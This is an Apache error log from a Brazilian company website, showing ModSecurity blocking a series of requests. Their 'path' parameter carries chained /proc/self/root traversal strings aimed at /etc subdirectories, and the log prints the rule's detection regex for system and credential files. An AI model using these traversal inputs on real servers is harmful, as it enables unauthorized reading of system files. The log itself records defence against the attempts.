[Wed Mar 18 06:53:16.691464 2026] [:error] [pid 29882:tid 140411674785536] [client 74.7.243.128:52120] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gnupg"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2DEzinOy1jxa1j4fotQAAAQg"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:18.033807 2026] [:error] [pid 31803:tid 140411607643904] [client 74.7.243.128:56362] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/udev"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2DuyqAr6etmhZHNqRfgAAAFA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:20.386119 2026] [:error] [pid 19507:tid 140411582465792] [client 74.7.243.128:56370] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/rwtab.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2ENY0UrI5A3LftIxvpAAAAZM"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:21.010392 2026] [:error] [pid 17887:tid 140411641214720] [client 74.7.241.31:46996] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2EQkwaGbbGflqUZDm5wAAAMw"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:53:21.703271 2026] [:error] [pid 17653:tid 140411699963648] [client 74.7.243.128:47212] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/varnish"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Ecdf6f5d65gmYZSokwAAAsU"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:24.029775 2026] [:error] [pid 17653:tid 140411658000128] [client 74.7.243.128:47216] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/locaweb"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2FMdf6f5d65gmYZSolQAAAso"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:30.754943 2026] [:error] [pid 19507:tid 140411624429312] [client 74.7.243.128:47220] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/tuned"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2GtY0UrI5A3LftIxvsAAAAY4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:33.105684 2026] [:error] [pid 19507:tid 140411733534464] [client 74.7.243.128:58834] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/wpa_supplicant"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2HdY0UrI5A3LftIxvsgAAAYE"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:53:34.374829 2026] [:error] [pid 19507:tid 140411590858496] [client 74.7.243.128:58848] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/gcrypt"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2HtY0UrI5A3LftIxvswAAAZI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:35.014074 2026] [:error] [pid 26799:tid 140411624429312] [client 74.7.241.31:54580] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/grub.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2H9a6ubjKNq_cu4ZsDwAAA04"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:53:38.419113 2026] [:error] [pid 11816:tid 140411716749056] [client 74.7.241.31:41122] [client 74.7.241.31] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc/cron.weekly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Iuw_le52K8_3pV22nAAAAgM"], referer: https://bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/proc/self/root/etc
[Wed Mar 18 06:53:38.924258 2026] [:error] [pid 17653:tid 140411624429312] [client 74.7.243.128:58854] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/prelink.conf.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Isdf6f5d65gmYZSonAAAAs4"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:53:41.268099 2026] [:error] [pid 15826:tid 140411741927168] [client 74.7.243.128:54674] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/chkconfig.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2JeoXxyEfFpUF8f9C7AAAAUA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:53:42.628735 2026] [:error] [pid 31803:tid 140411574073088] [client 74.7.243.128:54682] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/mysql"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2JuyqAr6etmhZHNqRhQAAAFQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:46.354807 2026] [:error] [pid 26799:tid 140411716749056] [client 74.7.243.128:54684] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/cron.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Kta6ubjKNq_cu4ZsGAAAA0M"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:47.647125 2026] [:error] [pid 15826:tid 140411574073088] [client 74.7.243.128:54688] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/libnl"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2K-oXxyEfFpUF8f9C8AAAAVQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:51.365094 2026] [:error] [pid 11816:tid 140411708356352] [client 74.7.243.128:54694] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/systemd"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2L-w_le52K8_3pV22owAAAgQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:53:53.719724 2026] [:error] [pid 11816:tid 140411741927168] [client 74.7.243.128:41804] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audit"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Mew_le52K8_3pV22pQAAAgA"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:54:03.564938 2026] [mime_magic:error] [pid 31803:tid 140411548894976] (70014)End of file found: [client 216.73.216.191:41549] AH01513: mod_mime_magic: read failed: /home/storage/0/fc/16/bandeirantesbomb3/public_html/index.php
[Wed Mar 18 06:54:04.131547 2026] [:error] [pid 26799:tid 140411565680384] [client 74.7.243.128:41810] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/init.d"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2PNa6ubjKNq_cu4ZsIgAAA1U"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:54:07.810050 2026] [:error] [pid 29882:tid 140411708356352] [client 74.7.243.128:53092] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/python"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2P0zinOy1jxa1j4fo4AAAAQQ"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
[Wed Mar 18 06:54:09.181171 2026] [:error] [pid 26799:tid 140411616036608] [client 74.7.243.128:53102] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.monthly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Qda6ubjKNq_cu4ZsJQAAA08"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:54:10.482925 2026] [:error] [pid 17887:tid 140411725141760] [client 74.7.243.128:51782] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc/cron.hourly"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2QgkwaGbbGflqUZDnIQAAAMI"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/self/root/etc
[Wed Mar 18 06:54:11.817218 2026] [:error] [pid 19507:tid 140411632822016] [client 74.7.243.128:51786] [client 74.7.243.128] ModSecurity: Access denied with code 403 (phase 2). Pattern match "(?:\\\\b(?:\\\\.(?:ht(?:access|passwd|group)|www_?acl)|global\\\\.asa|boot\\\\.ini)\\\\b|\\\\/etc\\\\/)" at ARGS:path. [file "/etc/modsecurity/locaweb-rules/activated_rules/modsecurity_crs_40_generic_attacks.conf"] [line "205"] [id "950005"] [rev "3"] [msg "Remote File Access Attempt"] [data "Matched Data: /etc/ found within ARGS:path: //proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc/audisp"] [severity "CRITICAL"] [ver "OWASP_CRS/2.2.8"] [maturity "9"] [accuracy "9"] [tag "OWASP_CRS/WEB_ATTACK/FILE_INJECTION"] [tag "WASCTC/WASC-33"] [tag "OWASP_TOP_10/A4"] [tag "PCI/6.5.4"] [hostname "www.bandeirantesbombas.com.br"] [uri "/"] [unique_id "abp2Q9Y0UrI5A3LftIxvwwAAAY0"], referer: https://www.bandeirantesbombas.com.br/?path=//proc/self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/proc/thread-self/root/etc
